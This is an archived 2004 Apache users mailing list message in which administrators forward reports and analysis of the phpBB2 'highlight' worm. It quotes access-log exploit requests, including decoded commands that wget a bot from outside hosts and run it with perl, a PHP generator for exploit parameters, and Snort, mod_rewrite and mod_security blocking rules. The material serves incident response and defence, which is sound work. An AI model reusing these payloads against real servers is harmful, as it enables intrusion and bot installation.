httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Dave Floyd <dave.fl...@pa.press.net>
Subject Re: [users@httpd] Is this for real?
Date Sat, 25 Dec 2004 10:13:01 GMT
Anders,
	Sadly this is quite likely. See the appended messages for more details:

At 20:23 +1100 21/12/2004, L. Walker wrote:
>Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
>Subject: Worm hitting PHPbb2 Forums
>From: "L. Walker" <lwalker@magi.net.au>
>To: incidents@securityfocus.com
>Cc: full-disclosure@lists.netsys.com
>
>Just spotted two clients hit by this.  One client didnt update his
>software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
>Chkrootkit says its Adore, however could be something else.  Datacenter
>wasn't very smart and has since wiped the server, so no binaries or other
>evidence.
>
>Generation 12 only wiped out PHP files, replacing them with its own
>message on other client's PHPbb2 forum.  Access logs show:
>
>66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
>/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high 
>light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108) 
>%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr( 
>111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25 
>2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62) 
>%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech 
>r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2 
>52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr 
>(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25 
>2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5 
>2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e 
>chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))% 
>252e%2527
>HTTP/1.0" 200 270
>"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73 
>fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101) 
>%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech 
>r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)% 
>252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11 
>3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec 
>hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)% 
>252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr 
>(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)% 
>252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1 
>12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252 
>echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78) 
>%252echr(41)%252echr(34))%252e%2527"
>"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
>--
>L. Walker <lwalker at magi dot net dot au>
>Network Administrator / Consultant
>--
>
>>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
>
>In addition to your post here is some more info. 
>
>http://isc.sans.org/
>
>>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>
>Front what I have read, this can happen in any phpbb version lower than 2.0.11
>
>This exploit is becoming frequent.  Normally uploading a ddos bot.
>>
>>At 12:53 -0500 21/12/2004, Chris Ess wrote:
>>
>>Generation 9 appears to overwrite files with the following extensions:
>>.htm, .php, .asp, .shtm, .jsp, .phtm
>>
>>It only displays a defacement message saying
>>
>>"NeverEverNoSanity WebWorm generation #"
>>
>>Where # is the generation of the worm.
>>
>>This bug only exploits a hole in phpBB2 as far as I can tell.  It does not
>>appear to exploit a hole within PHP.  In order to protect yourself, you
>>must upgrade phpBB2 to version 2.0.11.  See
>>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>>
>>The only code modification that this worm appears to do is increments its
>>generation count every time it hits a server.  Generation 9 does not
>>contain anything that would indicate the ability to install a rootkit.  I
>>suspect that the rootkit may have been installed separately.
>>
>>I extracted a full copy of generation 9 of this worm based on the access
>>logs of a site hit by it.  I was going to do a code review whenever I got
>>the chance to properly do one.
>>
>>Sincerely,
>>
>>
>>Chris Ess
>System Administrator / CDTT (Certified Duct Tape Technician)
>
>>At 11:29 -0700 21/12/2004, lists <lists@innocence-lost.net> wrote:
>
>Funny enough, I got a message from a former employer about this worm
>yesterday- a box I had setup that had hardened php on it got hit hard by
>this worm. I must've misread the advisory as I was under the impression
>that the Hardened PHP patches protected PHP through canary values from
>this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>>At 14:14 -0500 21/12/2004, Chris Ess wrote:
>
>> Funny enough, I got a message from a former employer about this worm
>> yesterday - a box I had setup that had hardened php on it got hit hard by
>> this worm. I must've misread the advisory as I was under the impression
>> that the Hardened PHP patches protected PHP through canary values from
>> this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>This worm appears to have nothing to do with the bugs fixed in versions
>4.3.10 and 5.0.3 of PHP.
>
>The bug occurs in this line in viewtopic.php in phpBB2:
>(Formatting changed to make it look pretty.  It's line 1109 in phpBB2
>2.0.10)
>
>$message = str_replace('\"', '"',
>	substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
>	"preg_replace('#\b(" . $highlight_match . ")\b#i',
>	'<span style=\"color:#"
>	. $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>'
.
>	$message . '<'), 1, -1));
>
>The 'e' flag on the regex pattern tells it to interpret the statement as
>valid PHP code and run it.  (Reference is:
>http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
>
>The bug that is exploited works in such a way that it actually runs the
>command that is passed through the highlight GET variable.  I'm not 100%
>sure how this works since I haven't had the chance to correlate the
>strings recorded in apache's access log with the above code.
>
>>At 12:21 -0700 21/12/2004, lists wrote:
>
>Yea good catch, after looking into it a little further I found that it
>wasn't related to that advisory, but rather to one from 11.13.04, the
>exploit code of the original bug can be found on k-otik.com
>
>Thanks for the info
>
>>At 21:00 +0000 21/12/2004, Barrie Dempster <barrie@reboot-robot.net> wrote:
>
>More information:
>
>Mis-reported and then corrected at the ISC -
>http://isc.sans.org/diary.php?date=2004-12-21
>
>* The advisory is here - htp://howdark.com/
>(it was there when the advisory was initially released but that site
>seems down atm, included here in hope that howdark.com resurfaces)
>
>* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
>
>* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
>(down as above, but included here as it was the original source, try
>here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
>
>* SNORT Rule is here - http://www.webservertalk.com/message554529.html
>
>* If you got owned by this then your Christmas present is here
>http://ysati.com hehe ;-P
>
>With Regards..
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
>>At 13:28 -0500 21/12/2004, Mike <mike_sha@shaw.ca> wrote:
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>>At 19:53 -0500 21/12/2004, M. Shirk wrote:
>
>I missed an important "F" on my previous post for these snort sigs.
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS 
>(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A 
>Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; 
>nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; 
>reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; 
>sid:9999999; rev:1;)
>
>Shirkdog
>http://www.shirkdog.us
>
>

At 15:51 -0800 20/12/2004, Shannon Lee wrote:
>X-VirusChecked: Checked
>X-Env-Sender: bugtraq-return-17330-dave.floyd=pa.press.net@securityfocus.
>  com
>X-StarScan-Version: 5.4.5; banners=-,-,-
>X-Originating-IP: [205.206.231.26]
>X-SpamWhitelisted: domain whitelist
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Mon, 20 Dec 2004 15:51:13 -0800
>From: Shannon Lee <shannon@webhostworks.net>
>User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040803)
>X-Accept-Language: en-us, en
>To: bugtraq@securityfocus.com
>Subject: phpBB Worm
>
>This morning one of our client's sites was found to have been defaced
>with the words "NeverEverNoSanity WebWorm Generation 9."  The defacement
>appeared to take place on all .html files in the web root trees of
>multiple virtual hosts on the web server in a very short period of time.
>
>After some investigation, we determined that the attacker had gained
>access via phpbb in a series of crafted URL requests, like so:
>
>64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
>/viewtopic.php?p=9002&sid=f5
>399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(1 
>09)%252echr
>(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102), 
>chr(97)),ch
>r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)% 
>252echr(47)
>%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252ec 
>hr(101)%252
>echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr( 
>101)%252ech
>r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
>OMITTED.com/
>viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=% 
>2527%252Efw
>rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50) 
>%252echr(11
>1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117) 
>%252echr(11
>5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252 
>echr(47)%25
>2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr 
>(117)%252ec
>hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
>(compatible; MSIE 6.0; Windows NT 5.1)"
>
>After checking the phpbb site, it turns out that this is a vulnerability
>posted the 18th of November, called Hilight; we didn't update to prevent
>it because the client whose domain it was has their own admin, and we
>thought he was taking care of phpBB.  Oops.  The exploit is described here:
>
>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
>When I copied all these entries out of the log and translated the chr()
>calls, they turned out to be the attached perl script, which is capable
>of finding .html files to deface, and then going to google and finding
>more instances of phpbb to infect.  Which makes it a worm.  It also
>tracks itself by generation; we were generation 9.
>
>Please find attached the above-mentioned script as well as the series of
>log entries from access_log.
>
>--Shannon
>
>
>
>At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
>>
>>If you cannot fix it (virtual servers) fast for all your clients 
>>you could also try with something like this:
>>
>>        RewriteEngine On
>>        RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>        RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>        RewriteRule ^.*$                                -               [F]
>>
>>We had some vhosts where this worked just fine. On our systems we 
>>didnt see any valid request with echr and esystem, just be gentle 
>>with it, it works for me, it could work for you ;)
>
>At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
>>
>>It seems that a good number of sites have been compromised due to this
>>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
>>revealed nothing. But, when I did the same search on the new MSN beta search
>>engine, a whopping 36,000 hits showed up. Check it out:
>>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo 
>>rm+Generation%22&FORM=QBRE
>
>At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bofh@fire-world.de> wrote:
>> > We had some vhosts where this worked just fine. On our systems we didnt
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>If you use mod_security, this may help, too:
>>
>>SecFilterSelective "THE_REQUEST" 
>>"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
 
>> >>
>>I had another exploit attempt, with this payload:
>>
>>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET 
>>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3 
>>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31 
>>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D% 
>>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6 
>>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68 
>>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A% 
>>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight= 
>>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41% 
>>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
>>
>>Which decodes to:
>>
>>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
>>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b 
>>*.pl b0t*; echo _END_
>>highlight='.passthru($HTTP_GET_VARS[rush]).'
>>
>>Regards,
>>
>>Sebastian
>
>At 17:21 +0200 22/12/2004, Alexander Klimov <alserkli@inbox.ru> wrote:
>>
>>It seems that automated exploiting starts soon after disclosure of the
>>vulnerability:
>>
>>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
>>"GET /viewtopic.php?t=50674&highlight=
>>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
>>HTTP/1.1" 404 219
>>
>>Interestingly, we do not use phpbb and in fact do not have 
>>viewtopic.php at all.
>
>At 4:34 +0000 22/12/2004, <ycw1bh302@sneakemail.com> wrote:
>>
>>Forgive me if this is a newbie question, but a site I help run was 
>>hit by this, and I'm trying to understand it to protect against 
>>future worms.
>>
>>The worm exploits the phpBB highlight vulnerability.  It uses PHP 
>>to run Perl to write the Perl script file, then executes it.  The 
>>script then proceeds to traverse the entire directory structure, 
>>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi 
>>files, and then spreads itself.  Correct?
>>
>>I have two questions:
>>
>>1.  Why has the worm been as effective on Windows servers as on 
>>*nix servers?  At the very least, shouldn't the difference in file 
>>and directory naming cause a problem?  I looked at the decoded Perl 
>>script, but I'm not a Perl expert, so I couldn't understand all of 
>>it.  And what about the difference in file permissions?
>>
>>2.  More importantly, why wasn't the worm's destructive ability 
>>limited by file permissions, especially on *nix servers?  If, for 
>>example, an HTML file on the server was uploaded by user bob, and 
>>has permissions of 755, how can the Perl script delete that file? 
>>Shouldn't the Perl script be created with the Perl process's 
>>permissions, which was invoked by PHP, which should have the Web 
>>server's permissions, which should be, at least on most *nix 
>>servers, the nobody user?
>>
>>This is a big issue on shared servers, or virtual hosts, whatever 
>>you want to call them.  Our site is on a shared server, and our 
>>site does not even run phpBB, but most of our HTML files were 
>>replaced with the worm's content.  Obviously, then, another site on 
>>the server must have an old version of phpBB.  But why could the 
>>worm, coming in through another site, modify files created by other 
>>users?  Even if the worm's script ran as the owner of the 
>>vulnerable viewtopic.php file, how could it then modify 
>>non-world-writable files created by other users?
>>
>>I have long been concerned with the security of PHP scripts, 
>>especially on shared servers.  Since PHP almost always runs as an 
>>Apache module, and Apache usually runs as nobody, one must make 
>>files and directories world-writable for PHP scripts to be able to 
>>write to them.  But that means that any process on the server, 
>>including anyone's PHP script, can modify the files.
>>
>>Thanks for any insights.
>>
>>Adam Porter
>
>At 21:28 -0600 22/12/2004, Alvin Packard wrote:
>>
>>Last look at my log files and I was hit a total of 421 times by 278
>>different IPs. It seems to be moving rather quickly as these were from
>>the last 2 days. Good luck to those who have not patched yet.
>>
>>Alvin Packard, CWNA
>>www.networksecuritytech.com
>
>At 13:31 +0100 23/12/2004, Anders Henke wrote:
>> > 1.  Why has the worm been as effective on Windows servers as on 
>>*nix servers?  At the very least, shouldn't the difference in file 
>>and directory naming cause a problem?  I looked at the decoded Perl 
>>script, but I'm not a Perl expert, so I couldn't understand all of 
>>it.  And what about the difference in file permissions?
>>
>>Perl does provide cross-platform-functions for e.g. file access and
>>there's usually not much of a difference for running a well-written
>>perl script on Unix as well as on Windows other than the first line
>>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
>>on Unix).
>>
>>However, most Windows-Webservers other than Apache do run any .pl-Script
>>using the to-be-installed perl interpreter and don't care on the bang-line.
>>
>>The documentation found in 'perldoc perlport' does give a closer view
>>on the few differences when writing cross-plattform perl scripts.
>>
>>> 2.  More importantly, why wasn't the worm's destructive ability 
>>>limited by file permissions, especially on *nix servers?  If, for 
>>>example, an HTML file on the server was uploaded by user bob, and 
>>>has permissions of 755, how can the Perl script delete that file? 
>>>Shouldn't the Perl script be created with the Perl process's 
>>>permissions, which was invoked by PHP, which should have the Web 
>>>server's permissions, which should be, at least on most *nix 
>>>servers, the nobody user?
>>
>>On shared servers with ISPs caring about security, user CGIs are using the
>>suexec mechanism in order to run each customer within his own user's space.
>>
>>The downside of using suexec is that PHP as a CGI doesn't offer a small
>>number of special features some people do believe to be essential, as well
>>as some people do write code in a way that making it work on PHP as CGI
>>is close to 'virtually impossible'. The PHP-Module also allows one to
>>set PHP-configuration settings via .htaccess; those configuration
>>changes are also ignored by CGI-PHP and can severely affect the way
>>an PHP-written application works (or doesn't work).
>>
>>> This is a big issue on shared servers, or virtual hosts, whatever 
>>>you want to call them.  Our site is on a shared server, and our 
>>>site does not even run phpBB, but most of our HTML files were 
>>>replaced with the worm's content.  Obviously, then, another site 
>>>on the server must have an old version of phpBB.  But why could 
>>>the worm, coming in through another site, modify files created by 
>>>other users?  Even if the worm's script ran as the owner of the 
>>>vulnerable viewtopic.php file, how could it then modify 
>>>non-world-writable files created by other users?
>>
>>
>>
>>Right - if everyone were using e.g. suexec, this would be the case.
>>
>>As a web host, you've got to chose to run either CGI-PHP or PHP as
>>module.
>>
>>Your 'power'-users are calling for the module, the admin keeping
>>maintenance on an already overloaded server does also all for the module
>>(the module relieves the web server from forking a seperate process for
>>running a php-script), only those security-related ones are rejecting both
>>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
>>
>>If your scripts support the fastcgi extension, one might use mod_fastcgi
>>with suexec support; however, this means one has to setup three softwares
>>(fastcgi, suexec, php) and make them work together instead of the
>>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
>>much work on a secure system, but your users are still calling for mod_php
>>and in case any part of your setup breaks, your whole system is unusable.
>>
>>> I have long been concerned with the security of PHP scripts, 
>>>especially on shared servers.  Since PHP almost always runs as an 
>>>Apache module, and Apache usually runs as nobody, one must make 
>>>files and directories world-writable for PHP scripts to be able to 
>>>write to them.  But that means that any process on the server, 
>>>including anyone's PHP script, can modify the files.
>>
>>
>>Yes, you've got the point.
>>
>>Apache 2 has the ability to run modules per VirtualHost within a different
>>user context (perchild MPM).
>>-According to the Apache documentation, this module is non-functional,
>> not yet finished and development is not currently active.
>>-PHP is certainly one of the most interesting modules for this feature,
>> however, the last time I looked, exactly PHP didn't support it and Apache
>> required to have at least one process running per virtualhost (which in
>> turn would render servers hosting thousands of sites unusable).
>>-Still today, the php documentation warns from using Apache 2.0 with PHP
>> in productive environment.
>>
>>>From a security aspect, the only way for running PHP securely
>>(with 'secure' from the view of the administrator), CGI is currently
>>the only way to do so.
>>
>>
>>
>>Regards,
>>
>>Anders
>>--
>>Schlund + Partner AG              Security and System Administration
>>Brauerstrasse 48                  v://49.721.91374.50
>>D-76135 Karlsruhe                 f://49.721.91374.225
>
>At 23:34 +0000 22/12/2004, William Geoghegan wrote:
>>
>>A script to check if your phpBB is vulnerable.
>>Anything below 2.0.11 _probably_ is but incase your not sure, use 
>>this script.
>>
>>The script generates the request parameters, all you need to do is 
>>copy the result onto www.thesite.com/viewtopic.php
>>
>>
>><?
>>$rush='ls -al'; //do what
>>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
>>
>>print "?t=%37&rush=";
>>
>>for ($i=0; $i<strlen($rush); ++$i) {
>> print '%' . bin2hex(substr($rush,$i,1));
>>}
>>
>>print "&highlight=%2527.";
>>
>>for ($i=0; $i<strlen($highlight); ++$i) {
>> prt '%' . bin2hex(substr($highlight,$i,1));
>>}
>>
>>print ".%2527";
>>?>
>>
>>Cheers.
>>
>>William Geoghegan
>>
>>GEOTEK Computer Services
>>- www.geotekcs.co.uk -
>
>At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
>>
>>Interestingly enough the worm was probably developed on *nix and than
>>checked and corrected to work on Windows:
>>
>>	eval{
>>		while(my @a = getpwent()) { push(@dirs, $a[7]);}
>>	};
>>
>>	push(@dirs, '/ ');
>>
>>the getpwent function is not supported on Windows. Actually the entire
>>loop that gets users home directories from the /etc/passwd file is very
>>*nix centric.
>>
>>The author found that out, added the eval statement to prevent the
>>script from crashing on Windows and added the root directory in order to
>>have at least one entry on windows. This last line actually makes the
>>entire loop less important.
>>
>>Additionally, on Windows the worm would affect files on a single disk.
>>As to which disk exactly, it probably depends on the web server
>>attacked, and how PHP and Perl are installed and used with the web
>>server. In some cases, if the web sites and the software do not reside
>>on the same disk, the worm payload will not work.
>>
>>
>>Ofer Shezaf, CTO
>>Breach Security, Inc.
>>Deployable Application Security
>>
>>Tel: +972.9.956.0036 ext.212
>>Cell: +972.54.443.1119
>>ofers@breach.com
>
>At 13:59 +0100 23/12/2004, Anders Henke wrote:
>> > If you cannot fix it (virtual servers) fast for all your clients you could
>>> also try with something like this:
>>>
>>>         RewriteEngine On
>>>         RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>>         RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>>         RewriteRule ^.*$                                -               [F]
>>>
>>> We had some vhosts where this worked just fine. On our systems we didnt
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>This assumes you're seeing GET-requests, but there are other ways
>>(e.g. POST) to exploit such code.
>>
>>GET-requests are so kind as they do show up in full in the web servers
>>access-log and as such, they do document the full exploit code.
>>E.g. just the accesslogs do provide enough information for site owner and
>>administrator to find out what's exactly broken and enables them to
>>perform detailed analysis on even previously unknown exploits as well
>>as reject such malicous code within a mod_rewrite-RewriteRule.
>>
>>Today, most such exploits are sent using HTTP-GET, but there's a fairly
>>low expense for exploit code coders to run these exploits using HTTP-POST.
>>We're lucky that most exploit code coders haven't chosen the struggle to
>>properly encode their exploit-code HTTP-POST-requests, but still keep
>>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
>>other than rejecting =any= POST-request to 'specific' files like
>>viewtopic.php, which obviously will sooner or later break some application.
>>
>>I've already had a single case where a 'common' insecurity like
>>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
>>so for the administrators out there, it might be a good idea to test and
>>implement mod_security on web servers.
>>As far as I known, the POST-payload analysis of mod_security is currently
>>one of the very few ways to audit and stop potentially malicious
>>HTTP-POST-data from reaching your web server's CGIs.
>
>At 16:10 +0000 24/12/2004, <steve@uptime.org.uk> wrote:
>>
>>>This assumes you're seeing GET-requests, but there are other ways
>>
>>>(e.g. POST) to exploit such code.
>>
>>Whilst I understand your point, it should be noted that this 
>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>the vulnerable data is sourced from $HTTP_GET_VARS.
>
>At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
>>
>>>Whilst I understand your point, it should be noted that this 
>>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>>the vulnerable data is sourced from $HTTP_GET_VARS.
>>
>>And it seems worse, we see even upgraded phpbb2 installs (2.0.11) 
>>succesfully and activly being exploited.
>>
>>216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET 
>>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F% 
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ 
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527 
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53 
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-" 
>>"LWP::Simple/5.803"
>>66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET 
>>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F% 
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ 
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527 
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53 
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-" 
>>"LWP::Simple/5.79"
>>64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET 
>>/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F% 
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ 
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527 
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53 
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68131 "-" 
>>"LWP::Simple/5.63"
>>[24/Dec/2004:19:09:26 +0100] "GET 
>>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F 
>>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf 
>>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252 
>>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5 
>>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20767 "-" 
>>"LWP::Simple/5.803"
>>205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET 
>>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F 
>>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf 
>>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252 
>>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5 
>>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20875 "-" 
>>"LWP::Simple/5.802"
>>
>>Loads of those, and all request the files from civa.org
>>
>>This is on a patched phpbb2, so be aware!!
>
>
>


rgds



>Do anybody have any ideas on this e-mail?  My admin inbox was full 
>of these e-mails this morning, I don't know if
>they're for real, or what...  Can someone please advice? There is 
>one phpbb running on the server...
>
>
>HEADERS:
>
>Return-Path: <wwwrun@iris>
>Received: from mail.the-server.net ([unix socket])
>	by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
>X-Sieve: CMU Sieve 2.2
>Received: from localhost (localhost [127.0.0.1])
>	by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
>	Sat, 25 Dec 2004 00:50:23 +0100 (CET)
>Received: from mail.the-server.net ([127.0.0.1])
> by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
>Received: by mail.the-server.net (Postfix, from userid 30)
>	id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
>Date: Sat, 25 Dec 2004 00:48:48 +0100
>To: postmaster, hostmaster, abuse, admin, root
>Subject: YOUR SERVER HAS BEEN HACKED
>Message-ID: <41CCAAE0.mailC4S112L68@iris.the-server.net>
>User-Agent: nail 10.5 4/27/03
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>From: wwwrun (WWW daemon apache)
>X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
>
>
>MESSAGE BODY:
>
>YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
>
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message